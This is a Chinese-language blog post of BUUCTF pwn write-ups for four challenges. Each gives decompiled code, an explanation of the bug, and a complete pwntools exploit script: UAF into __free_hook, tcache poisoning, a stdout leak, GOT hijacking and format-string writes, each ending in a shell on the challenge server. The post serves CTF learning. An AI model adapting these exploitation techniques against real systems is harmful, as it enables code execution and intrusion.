fa1c4
fa1c4

BUUCTF pwn wp 126 - 130

gyctf_2020_document

gyctf_2020_document$ file gyctf_2020_document;checksec gyctf_2020_document 
gyctf_2020_document: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=54811a534aab1bd40188ff6bfcff12dbeafb5f08, stripped
[*] '/home/pwn/桌面/gyctf_2020_document/gyctf_2020_document'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

正常题目, 保护全开

add函数, name, sex, info

unsigned __int64 add()
{
  int i; // [rsp+Ch] [rbp-24h]
  _QWORD *v2; // [rsp+10h] [rbp-20h]
  _QWORD *content; // [rsp+18h] [rbp-18h]
  __int64 s; // [rsp+20h] [rbp-10h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i < 7; ++i )
  {
    if ( !docs[i] )
    {
      v2 = malloc(8uLL);                        // 0x10 chunk
      content = malloc(0x80uLL);
      if ( !v2 || !content )
      {
        puts("Error occured!!!");
        exit(2);
      }
      puts("add success");
      *v2 = content;
      v2[1] = 1LL;
      puts("input name");
      memset(&s, 0, sizeof(s));
      readchs(&s, 8LL);
      *content = s;                             // content[0] <- name
      puts("input sex");
      memset(&s, 0, sizeof(s));
      readchs(&s, 1LL);
      puts("here");
      if ( (_BYTE)s == ch_W[0] )
      {
        content[1] = 1LL;                       // content[1] <- sex
      }
      else
      {
        puts("there");
        content[1] = 16LL;
      }
      puts("input information");
      readchs(content + 2, 112LL);              // content[2] <- information
      docs[i] = v2;
      puts("Success");
      break;
    }
  }
  if ( i == 7 )
    puts("Th3 1ist is fu11");
  return __readfsqword(0x28u) ^ v5;
}

delete函数, UAF

unsigned __int64 delete()
{
  unsigned int v1; // [rsp+Ch] [rbp-24h]
  char buf[8]; // [rsp+20h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Give me your index : ");
  read(0, buf, 8uLL);
  v1 = atoi(buf);
  if ( v1 >= 7 )
  {
    puts("Out of list");
  }
  else if ( *((_QWORD *)&unk_202060 + v1) )
  {
    free(**((void ***)&unk_202060 + v1));
  }
  else
  {
    puts("invalid");
  }
  return __readfsqword(0x28u) ^ v3;
}

比较常规的UAF打free_hook(或者malloc_hook)

from pwn import *

url, port = "node4.buuoj.cn", 27352
filename = "./gyctf_2020_document"
elf = ELF(filename)
libc = ELF("./libc64-2.23.so")
context(arch="amd64", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()
    
lf = lambda addrstring, address: log.info('{}: %#x'.format(addrstring), address)

def add(name, sex, content):
    io.sendlineafter('Give me your choice : \n', '1')
    io.sendafter("input name\n", name)
    io.sendafter("input sex\n", sex)
    io.sendafter("input information\n", content)

def show(index):
    io.sendlineafter('Give me your choice : \n', '2')
    io.sendlineafter("Give me your index : \n", str(index))

def edit(index, content):
    io.sendlineafter('Give me your choice : \n', '3')
    io.sendlineafter("Give me your index : \n", str(index))
    io.sendlineafter("Are you sure change sex?\n", 'N')
    io.sendafter("Now change information\n", content)

def delete(index):
    io.sendlineafter('Give me your choice : \n', '4')
    io.sendlineafter("Give me your index : \n", str(index))

def pwn():
    add('ffffa1c4', 'guesssss', cyclic(0x70))
    add('ffffa1c4', 'guesssss', cyclic(0x70))
    delete(0)
    show(0)
    libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3c4b20 - 88
    free_hook = libc_base + libc.sym['__free_hook']
    system_addr = libc_base + libc.sym['system']
    lf('free hook address', free_hook)
    lf('system address', system_addr)

    add('/bin/sh\x00', '/bin/sh\x00', cyclic(0x70))
    delete(1)

    add('/bin/sh\x00', '/bin/sh\x00', cyclic(0x70))
    payload = p64(0) + p64(0x21) + p64(free_hook - 0x10)
    payload += p64(1) + p64(0) + p64(0x51)
    payload = payload.ljust(0x70, b'\x00')

    edit(0, payload)
    payload = p64(system_addr).ljust(0x70, b'\x00')
    edit(3, payload)
    delete(2)


if __name__ == "__main__":
    pwn()
    io.interactive()

ciscn_2019_final_5

ciscn_2019_final_5$ file ciscn_final_5;checksec ciscn_final_5 
ciscn_final_5: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ../glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so, for GNU/Linux 2.6.32, BuildID[sha1]=ad75f1d8a9c718fae2aeb53bf0ebc5892400524c, stripped
[*] '/home/pwn/桌面/ciscn_2019_final_5/ciscn_final_5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)

add函数, 这个题的处理是比较奇怪的, 因为buf会和index进行|操作

__int64 add()
{
  __int64 result; // rax
  int i; // [rsp+4h] [rbp-1Ch]
  int size; // [rsp+8h] [rbp-18h]
  int index; // [rsp+Ch] [rbp-14h]
  void *buf; // [rsp+10h] [rbp-10h]
  __int64 or_res; // [rsp+18h] [rbp-8h]

  printf("index: ");
  index = choice("index: ");
  if ( index < 0 || index > 16 )
  {
    puts("index is invalid.");
    exit(-1);
  }
  printf("size: ");
  size = choice("size: ");
  if ( size < 0 || size > 4096 )
  {
    puts("size is invalid.");
    exit(-1);
  }
  buf = malloc(size);
  if ( !buf )
  {
    puts("malloc error.");
    exit(-1);
  }
  printf("content: ");
  read(0, buf, size);
  print_low12bits(buf);
  result = buf_or_index(buf, (unsigned int)index);
  or_res = result;
  for ( i = 0; i <= 16; ++i )
  {
    result = contents[i];
    if ( !result )
    {
      contents[i] = or_res;
      result = i;
      sizes[i] = size;
      break;
    }
  }
  if ( i == 17 )
  {
    puts("heap note is full.");
    exit(-1);
  }
  return result;
}

delete函数, 也比较诡异, 因为索引的下标和content的内容相关, 而且free掉的指针是抹掉低4bits的

int delete()
{
  int result; // eax
  int i; // [rsp+8h] [rbp-8h]
  int index; // [rsp+Ch] [rbp-4h]

  printf("index: ");
  result = choice("index: ");
  index = result;
  if ( result < 0 || result > 16 )
  {
    puts("index is invalid.");
    exit(-1);
  }
  for ( i = 0; i <= 16; ++i )
  {
    result = content_and_0xF(contents[i]);
    if ( result == index )
    {
      free((void *)(contents[i] & 0xFFFFFFFFFFFFFFF0LL));
      contents[i] = 0LL;
      sizes[i] = 0;
      result = puts("free success.\n");
      break;
    }
  }
  if ( i == 17 )
  {
    puts("free is invalid.");
    exit(-1);
  }
  return result;
}

漏洞通常出现在程序奇怪的逻辑处, 这题的漏洞也是出在index索引算法上
因为chunk的分配会对齐0x10, 所以低4bits均为0, 用ptr & 0xFFFFFFFFFFFFFFF0取指针是没问题的, 而在add时, 会把index | buf, 即buf指针实际上最后一位应该为0, 但是用来存储了index, (应该算是一种空间优化?
所以ptr & 0xF是取出index进行索引, 整体逻辑是行得通的, 但是问题也就出在这里.
考虑特殊情况, 如果输入index == 0x10 , 此时ptr | 0x10会改变实际的地址, 用低4bits保存index的预期功能就错了, 此时ptr & 0xF取出来的index为0, 所以index == 0x10index == 0索引到同一个index. 而且edit功能里这一点也可以利用, 因为指针会指向ptr & 0xFFFFFFFFFFFFFFF0, 而ptr | 0x10已经将ptr抬高了0x10, 所以会修改到邻近的下一个chunk的chunk header, 也就能控制presizesize

这个题就是逻辑漏洞的堆溢出, 改完chunk的size, delete之后会进入unsorted bin, 申请回来则可以控制更高地址的chunks, 用tcache attack申请出free_got地址的chunk, 修改free@got到puts@plt, 泄露libc然后再修改free@got到system

因为索引地址的算法问题, 需要修改0x602010的地址处才能覆盖free@got, 而且应该用index=8索引, 下图是调试时用index=0索引发现索引到puts@got, 才意识到索引算法的问题所在
BUUCTF pwn wp 126 - 130_第1张图片
另外因为index是按content的低4bits的值索引的, 而且是从小到大遍历索引, 所以需要puts_got + 1, 而free@gotindex=8索引, 最后delete掉第0个index的content, 再用index=8索引到atoi@got, 利用索引算法的歧义性完成payload的构造, 这里的利用相当精巧

from pwn import *

url, port = "node4.buuoj.cn", 25558
filename = "./ciscn_final_5"
elf = ELF(filename)
libc = ELF("./libc.so.6")
context(arch="amd64", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()
    
lf = lambda addrstring, address: log.info('{}: %#x'.format(addrstring), address)

def add(index, size, content):
    io.sendlineafter('your choice: ', '1')
    io.sendlineafter('index: ', str(index))
    io.sendlineafter('size: ', str(size))
    io.sendafter('content: ', content)
    io.recvuntil('low 12 bits: ')
    return int(io.recvuntil('\n', drop=True), 16)

def delete(index):
    io.sendlineafter('your choice: ', '2')
    io.sendlineafter('index: ', str(index))

def edit(index, content):
    io.sendlineafter('your choice: ', '3')
    io.sendlineafter('index: ', str(index))
    io.sendafter('content: ', content)

def pwn():
    free_got = elf.got['free']
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    atoi_got = elf.got['atoi']
    contents_addr = 0x00000000006020E0

    add(16, 0x20, 'chunk0')
    add(1, 0x20, 'chunk1')
    add(2, 0x20, 'chunk2')
    add(3, 0x20, 'chunk3')
    add(4, 0x20, 'chunk4')
    # B()
    payload = cyclic(0x10) + p64(0) + p64(0x181)
    edit(0, payload)
    # B()
    delete(1) # unsorted bin 
    delete(2)
    payload = cyclic(0x20) + p64(0) + p64(0x31) + p64(contents_addr)
    add(1, 0x170, payload)
    # B()
    add(2, 0x20, 'chunk5')

    payload = p64(free_got) + p64(puts_got + 1) + p64(atoi_got) * 2
    # B()
    add(5, 0x20, payload)
    # B()
    edit(8, p64(puts_plt) * 2)
    # B()
    delete(1) # leak puts address
    puts_addr = u64(io.recvuntil('\n', drop=True).ljust(8, b'\x00'))
    libc_base = puts_addr - libc.sym['puts']
    system_addr = libc_base + libc.sym['system']
    lf('puts address', puts_addr)
    lf('system address', system_addr)
    
    delete(8) # set free@got to 0 and index will get atoi@got
    edit(8, p64(system_addr) * 2)
    io.sendlineafter('your choice: ', '/bin/sh\x00')


if __name__ == "__main__":
    pwn()
    io.interactive()

小结
逻辑漏洞 + 堆溢出 + tcache attack + 无show泄露 + 劫持got表

roarctf_2019_realloc_magic

roarctf_2019_realloc_magic$ file roarctf_2019_realloc_magic;checksec roarctf_2019_realloc_magic
roarctf_2019_realloc_magic: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=3d7be4b70bdfe7373cf768112a90fe7f2783264e, not stripped
[*] '/home/pwn/桌面/roarctf_2019_realloc_magic/roarctf_2019_realloc_magic'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

保护全开

只有add和delete以及一个清空realloc_ptr的函数, 因为保护Full RELRO开启, 所以也无法劫持got表实现free@got到puts@plt泄露libc

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax

  init(argc, argv, envp);
  while ( 1 )
  {
    menu();
    v3 = get_int();
    switch ( v3 )
    {
      case 2:
        fr();
        break;
      case 666:
        ba();
        break;
      case 1:
        re();
        break;
      default:
        puts("invalid choice");
        break;
    }
  }
}

ba函数, 将realloc_ptr置为0, 但只能用一次

int ba()
{
  if ( lock )
    exit(-1);
  lock = 1;
  realloc_ptr = 0LL;
  return puts("Done");
}

re函数, 即delete函数, 如果用re函数释放chunk, 这里由于realloc的特性, 不会将ptr置为空, 所以存在double free漏洞

int re()
{
  unsigned int size; // [rsp+Ch] [rbp-4h]

  puts("Size?");
  size = get_int();
  realloc_ptr = realloc(realloc_ptr, size);
  puts("Content?");
  read(0, realloc_ptr, size);
  return puts("Done");
}

整个程序一次只能操控一个chunk, 实际上也够了

这题需要realloc的冷(re)知识
realloc(realloc_ptr, size);
(1) realloc_ptr != null && size == 0, 相当于free
(2) realloc_ptr == null && size > 0, 相当于malloc
(3) 原size >= realloc的size, 则chunk直接缩小, 剩余部分归到bins中, 返回ptr
(4) 原size < realloc的size, 分两种情况, 如果该chunk之后空间充足, 则直接扩充然后返回ptr; 否则另外malloc(size), copy内容过去, 然后free(原ptr), 返回新ptr.
因为保护全开且无show, 所以这种情况还需要利用_IO_2_1_stdout_实现无show泄露
原理可以参考Ex师傅的blog

漏洞利用: unsortedbin attack + tcache attack劫持_IO_2_1_stdout_(需要爆破4bits, 1/16的概率), 泄露libc; 然后清空ptr指针, 继续tcache attack劫持free_hook到one gadget

from pwn import *

url, port = "node4.buuoj.cn", 29332
filename = "./roarctf_2019_realloc_magic"
elf = ELF(filename)
libc = ELF("./libc64-2.27.so")
context(arch="amd64", os="linux")
local = 0
context.log_level = "debug"

def B():
    gdb.attach(io)
    pause()
    
lf = lambda addrstring, address: log.info('{}: %#x'.format(addrstring), address)

def realloc(size=0, content=b'\x00'):
    io.sendlineafter('>> ', '1')
    io.sendlineafter('Size?', str(size))
    io.recvuntil("Content?")
    if size > 0: io.send(content)

def delete():
    io.sendlineafter('>> ', '2')

def clearptr():
    io.sendlineafter('>> ', '666')

'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

def pwn():
    one_gadgets = [0x4f2c5, 0x4f322, 0x10a38c]

    realloc(0x30)
    realloc()
    realloc(0x80)
    realloc()
    realloc(0x40)
    realloc()

    realloc(0x80)
    for i in range(7): # fill tcache
        delete()

    realloc() # put into unsortbin
    realloc(0x30)
    payload = cyclic(0x38) + p64(0x51) + p8(0x60) + p8(0x87)
    realloc(0x50, payload) # overlap
    realloc()
    # B()
    realloc(0x80)
    # B()
    realloc()

    payload = p64(0xFBAD1887) + p64(0) * 3 + p8(0x58)
    # get _IO_2_1_stdout_ and change flag 
    realloc(0x80, payload)

    # leak libc
    libc_base = u64(io.recvuntil(b'\x7f', timeout=0.5)[-6:].ljust(8, b'\x00')) - 0x3e82a0
    # if libc_base == -0x3e82a0: exit(-1)
    lf('libc base address', libc_base)

    free_hook = libc_base + libc.sym['__free_hook']
    one_gadget = libc_base + one_gadgets[1]

    clearptr()
    # exploiting the same as above
    realloc(0x110)
    realloc()
    realloc(0x120)
    realloc()
    realloc(0x130)
    realloc()

    realloc(0x120)
    for i in range(7):
        delete()
    realloc()

    realloc(0x110)
    payload = cyclic(0x118) + p64(0x241) + p64(free_hook)
    realloc(0x240, payload)
    realloc()
    realloc(0x120)
    realloc()
    realloc(0x120, p64(one_gadget))
    delete()


if __name__ == "__main__":
    while True:
        if local:
            io = process(filename)
        else:
            io = remote(url, port)

        try:
            pwn()
            io.interactive()
        except:
            io.close()

之后本地打通了, 但是打远程的时候发现上百次pwn都打不通, 可能是网络延迟问题, 把timeout改大一点就通了

小结
realloc double free + unsorted bin attack + _IO_2_1_stdout_泄露libc + tcache attack(tcache poisoning) + 爆破4bits + 劫持free_hook + 打one_gadget
肉眼可见的复杂度 OvO (其实也还好, 就是调试比较费劲, 前后调了3个多小时

houseoforange_hitcon_2016

经典题目, 看另一篇单独的blog解析
hitcon2016 house of orange

SWPUCTF_2019_login

SWPUCTF_2019_login$ file SWPUCTF_2019_login;checksec SWPUCTF_2019_login
SWPUCTF_2019_login: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=dbbf329da12ebdd87dcae5d032eda61796f7d0c3, stripped
[*] '/home/pwn/桌面/SWPUCTF_2019_login/SWPUCTF_2019_login'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

int __cdecl main()
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Please input your name: ");
  read(0, &unk_804B080, 0xCu);
  puts("Base maybe not easy......");
  return sub_80485E3();
}

int sub_80485E3()
{
  printf("hello, %s", byte_804B080);
  return sub_804854B();
}

BUUCTF pwn wp 126 - 130_第2张图片
BSS段的fmt漏洞, 倒是第一次见到

不过利用方法, 跟堆上的fmt漏洞相似, 为ebp链实现的got表劫持

from pwn import *

url, port = "node4.buuoj.cn", 26466
filename = "./SWPUCTF_2019_login"
elf = ELF(filename)
libc = ELF('./libc32-2.27.so')
context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()
    
lf = lambda addrstring, address: log.info('{}: %#x'.format(addrstring), address)

def pwn():
    io.sendlineafter('name:', 'fa1c4')
    io.sendlineafter('password:', '%15$p')
    io.recvuntil('0x')
    __libc_start_main = int(io.recvuntil('\n', drop=True), 16) - 0xf1
    libc_base = __libc_start_main - libc.sym['__libc_start_main']
    system_addr = libc_base + libc.sym['system']
    lf('libc base address', libc_base)
    lf('system address', system_addr)

    io.sendlineafter('Try again!', '%6$p')
    io.recvuntil('0x')
    stack_addr0 = int(io.recvuntil('\n', drop=True), 16)
    lf('stack address 0', stack_addr0)

    io.sendlineafter('Try again!', '%10$p')
    io.recvuntil('0x')
    stack_addr1 = int(io.recvuntil('\n', drop=True), 16)
    lf('stack address 1', stack_addr1)

    # change $14$p to printf@got
    payload = '%' + str(0x14) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0x14

    payload = '%' + str((stack_addr1 & 0xff) + 1) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload) 

    payload = '%' + str(0xb0) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0xb0

    payload = '%' + str((stack_addr1 & 0xff) + 2) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload) 

    payload = '%' + str(0x04) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0x04

    payload = '%' + str((stack_addr1 & 0xff) + 3) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload) 

    payload = '%' + str(0x08) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0x08

    # change %15$p to printf@got + 1
    stack_addr2 = stack_addr1 + 4
    payload = '%' + str(stack_addr2 & 0xff) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload)

    payload = '%' + str(0x15) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0x15

    payload = '%' + str((stack_addr2 & 0xff) + 1) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload)

    payload = '%' + str(0xb0) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0xb0

    payload = '%' + str((stack_addr2 & 0xff) + 2) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload)

    payload = '%' + str(0x04) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0x04

    payload = '%' + str((stack_addr2 & 0xff) + 3) + 'c' + '%6$hhn'
    io.sendlineafter('Try again!', payload)

    payload = '%' + str(0x08) + 'c' + '%10$hhn'
    io.sendlineafter('Try again!', payload) # 0x08

    payload = '%' + str(system_addr & 0xff) + 'c' + '%14$hhn'
    payload += '%' + str(((system_addr & 0xffff00) >> 8) - 0x10) + 'c' + '%15$hn'
    io.sendlineafter('Try again!', payload)
    sleep(0.3)
    io.sendline('/bin/sh\x00')


if __name__ == "__main__":
    pwn()
    io.interactive()

这个题本地调试(Ubuntu20.04)跟远程环境有差, 目前没找到原因, 可能需要用ubuntu18? 暂时先算一个疑点, 之后回来填坑

阶段性总结

断断续续花了几个月时间刷BUUCTF的PWN题, 截止目前已经做了130题, 并且全部都是python3打的(一个是有点标新立异的意味, 另一个是强制要求亲自实现每一个exp, 因为大部分师傅的exp都是python2写的, 直接ctrl c +ctrl v一般都不能通)
水平还是挺菜的, 不过应该算是入门了基础的PWN, 现在也要正式考虑一下PWN二转的事情了, 跟着圈内师傅们混和各种涉猎也算有一点点积累, PWN二转可以考虑的方向包括但不限于:

  • Kernel pwn,
  • IoT pwn,
  • VM pwn,
  • Chrome pwn,
  • Windows pwn
  • Android pwn

以及漏洞挖掘方向

  • IoT fuzz
  • linux kernel fuzz
  • windows kernel fuzz
  • Android fuzz
  • network protocol fuzz

当然漏洞挖掘方向fuzzing也只是一个分支, 目前还没入坑, 暂且先这么总结叭

AI方向 (BinaryAI

  • AutoPwn
  • AI PWN
  • AI + 漏洞挖掘
  • AI + 程序分析(或许可以包括在漏洞挖掘里)
  • AI + 逆向工程
  • AI + 漏洞修复

程序分析方向
其实程序分析应该算是一门独立的学科, 虽然可以服务于漏洞挖掘和利用
程序分析基础也要开始学习了, 科研工作标配之一…

总之PWN的世界之广阔和丰富依然是才疏学浅的我难以想象的
BUUCTF PWN WP系列先停更一段时间, 目前的打算是之后比较长一段时间将处在开荒阶段, 开始探索各个有趣的新地图了

这里再引用一次TK教主的口头禅: 先干了再说

你可能感兴趣的:(PWN,PWN,linux,程序分析)

  • android系统selinux中添加新属性property 辉色投像
    1.定位/android/system/sepolicy/private/property_contexts声明属性开头:persist.charge声明属性类型:u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
  • Linux下QT开发的动态库界面弹出操作(SDL2) 13jjyao QT类qt开发语言sdl2linux
    需求:操作系统为linux,开发框架为qt,做成需带界面的qt动态库,调用方为java等非qt程序难点:调用方为java等非qt程序,也就是说调用方肯定不带QApplication::exec(),缺少了这个,QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出);这与qt调用本身qt库是有本质的区别的思路:1.调用方缺QApplication::exec(),那么我们在接口
  • linux sdl windows.h,Windows下的SDL安装 奔跑吧linux内核 linuxsdlwindows.h
    首先你要下载并安装SDL开发包。如果装在C盘下,路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤:1.打开VC++,点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4,现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
  • linux中sdl的使用教程,sdl使用入门 Melissa Corvinus linux中sdl的使用教程
    本文通过一个简单示例讲解SDL的基本使用流程。示例中展示一个窗口,窗口里面有个随机颜色快随机移动。当我们鼠标点击关闭按钮时间窗口关闭。基本步骤如下:1.初始化SDL并创建一个窗口。SDL_Init()初始化SDL_CreateWindow()创建窗口2.纹理渲染存储RGB和存储纹理的区别:比如一个从左到右由红色渐变到蓝色的矩形,用存储RGB的话就需要把矩形中每个点的具体颜色值存储下来;而纹理只是一
  • PHP环境搭建详细教程 好看资源平台 前端php
    PHP是一个流行的服务器端脚本语言,广泛用于Web开发。为了使PHP能够在本地或服务器上运行,我们需要搭建一个合适的PHP环境。本教程将结合最新资料,介绍在不同操作系统上搭建PHP开发环境的多种方法,包括Windows、macOS和Linux系统的安装步骤,以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类:集成开发环境:例如XAMPP、WAMP、MAMP,这
  • 使用 FinalShell 进行远程连接(ssh 远程连接 Linux 服务器) 编程经验分享 开发工具服务器sshlinux
    目录前言基本使用教程新建远程连接连接主机自定义命令路由追踪前言后端开发,必然需要和服务器打交道,部署应用,排查问题,查看运行日志等等。一般服务器都是集中部署在机房中,也有一些直接是云服务器,总而言之,程序员不可能直接和服务器直接操作,一般都是通过ssh连接来登录服务器。刚接触远程连接时,使用的是XSHELL来远程连接服务器,连接上就能够操作远程服务器了,但是仅用XSHELL并没有上传下载文件的功能
  • libyuv之linux编译 jaronho Linuxlinux运维服务器
    文章目录一、下载源码二、编译源码三、注意事项1、银河麒麟系统(aarch64)(1)解决armv8-a+dotprod+i8mm指令集支持问题(2)解决armv9-a+sve2指令集支持问题一、下载源码到GitHub网站下载https://github.com/lemenkov/libyuv源码,或者用直接用git克隆到本地,如:gitclonehttps://github.com/lemenko
  • ARM驱动学习之5 LEDS驱动 JT灬新一 嵌入式C底层arm开发学习单片机
    ARM驱动学习之5LEDS驱动知识点:•linuxGPIO申请函数和赋值函数–gpio_request–gpio_set_value•三星平台配置GPIO函数–s3c_gpio_cfgpin•GPIO配置输出模式的宏变量–S3C_GPIO_OUTPUT注意点:DRIVER_NAME和DEVICE_NAME匹配。实现步骤:1.加入需要的头文件://Linux平台的gpio头文件#include//三
  • 【华为OD技术面试真题精选 - 非技术题】 -HR面,综合面_华为od hr面 一个射手座的程序媛 程序员华为od面试职场和发展
    最后的话最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!资料预览给大家整理的视频资料:给大家整理的电子书资料:如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以点击这里获
  • 简介Shell、zsh、bash zhaosuningsn Shellzshbashshelllinuxbash
    Shell是Linux和Unix的外壳,类似衣服,负责外界与Linux和Unix内核的交互联系。例如接收终端用户及各种应用程序的命令,把接收的命令翻译成内核能理解的语言,传递给内核,并把内核处理接收的命令的结果返回给外界,即Shell是外界和内核沟通的桥梁或大门。Linux和Unix提供了多种Shell,其中有种bash,当然还有其他好多种。Mac电脑中不但有bash,还有一个zsh,预装的,据说
  • Linux MariaDB使用OpenSSL安装SSL证书 Meta39 MySQLOracleMariaDBLinuxWindowsssllinuxmariadb
    进入到证书存放目录,批量删除.pem证书警告:确保已经进入到证书存放目录find.-typef-iname\*.pem-delete查看是否安装OpenSSLopensslversion没有则安装yuminstallopensslopenssl-devel开启SSL编辑/etc/my.cnf文件(没有的话就创建,但是要注意,在/etc/my.cnf.d/server.cnf配置了datadir的,
  • 【从浅识到熟知Linux】Linux发展史 Jammingpro 从浅学到熟知Linuxlinux运维服务器
    归属专栏:从浅学到熟知Linux个人主页:Jammingpro每日努力一点点,技术变化看得见文章前言:本篇文章记录Linux发展的历史,因在介绍Linux过程中涉及的其他操作系统及人物,本文对相关内容也有所介绍。文章目录Unix发展史Linux发展史开源Linux官网企业应用情况发行版本在学习Linux前,我们可能都会问Linux从哪里来?它是如何发展的。但在介绍Linux之前,需要先介绍一下Un
  • linux 发展史 种树的猴子 内核java操作系统linux大数据
    linux发展史说明此前对linux认识模糊一知半解,近期通过学习将自己对于linux的发展总结一下方便大家日后的学习。那Linux是目前一款非常火热的开源操作系统,可是linux是什么时候出现的,又是因为什么样的原因被开发出来的呢。以下将对linux的发展历程进行详细的讲解。目录一、Linux发展背景二、UINIX的诞生三、UNIX的重要分支-BSD的诞生四、Minix的诞生五、GNU与Free
  • Linux sh命令 fengyehongWorld Linuxlinux
    目录一.基本语法二.选项2.1-c字符串中读取内容,并执行2.1.1基本用法2.1.2获取当前目录下失效的超链接2.2-x每个命令执行之前,将其打印出来2.3结合Here文档使用一.基本语法⏹Linux和Unix系统中用于执行shell脚本或运行命令的命令。sh[选项][脚本文件][参数...]⏹选项-c:从字符串中读取内容,并执行。-x:在每个命令执行之前,将其打印出来。-s:从标准流中读取内容
  • Linux vi常用命令 fengyehongWorld Linuxlinux
    参考资料viコマンド(vimコマンド)リファレンス目录一.保存系命令二.删除系命令三.移动系命令四.复制粘贴系命令一.保存系命令⏹保存并退出:wq⏹强制保存并退出:wq!⏹退出(文件未编辑):q⏹强制退出(忽略已编辑内容):q!⏹另存为:w新文件名二.删除系命令⏹删除当前行dd⏹清空整个文档gg:移动到文档顶部dG:删除到最后一行ggdG三.移动系命令⏹移动到文档顶部gg⏹移动到文档底部#方式1G
  • Linux查看服务器日志 TPBoreas 运维linux运维
    一、tail这个是我最常用的一种查看方式用法如下:tail-n10test.log查询日志尾部最后10行的日志;tail-n+10test.log查询10行之后的所有日志;tail-fn10test.log循环实时查看最后1000行记录(最常用的)一般还会配合着grep用,(实时抓包)例如:tail-fn1000test.log|grep'关键字'(动态抓包)tail-fn1000test.log
  • 笋丁网页自动回复机器人V3.0.0免授权版源码 希希分享 软希网58soho_cn源码资源笋丁网页自动回复机器人
    笋丁网页机器人一款可设置自动回复,默认消息,调用自定义api接口的网页机器人。此程序后端语言使用Golang,内存占用最高不超过30MB,1H1G服务器流畅运行。仅支持Linux服务器部署,不支持虚拟主机,请悉知!使用自定义api功能需要有一定的建站基础。源码下载:https://download.csdn.net/download/m0_66047725/89754250更多资源下载:关注我。安
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • NPM私库搭建-verdaccio(Linux) Beam007 npmlinux前端
    1、安装nodelinux服务器安装nodea)、官网下载所需的node版本https://nodejs.org/dist/v14.21.0/b)、解压安装包若下载的是xxx.tar.xz文件,解压命令为tar-xvfxxx.tar.xzc)、修改环境变量修改:/etc/profile文件#SETPATHFORNODEJSexportNODE_HOME=NODEJS解压安装的路径exportPAT
  • C++常见知识掌握 nfgo c++开发语言
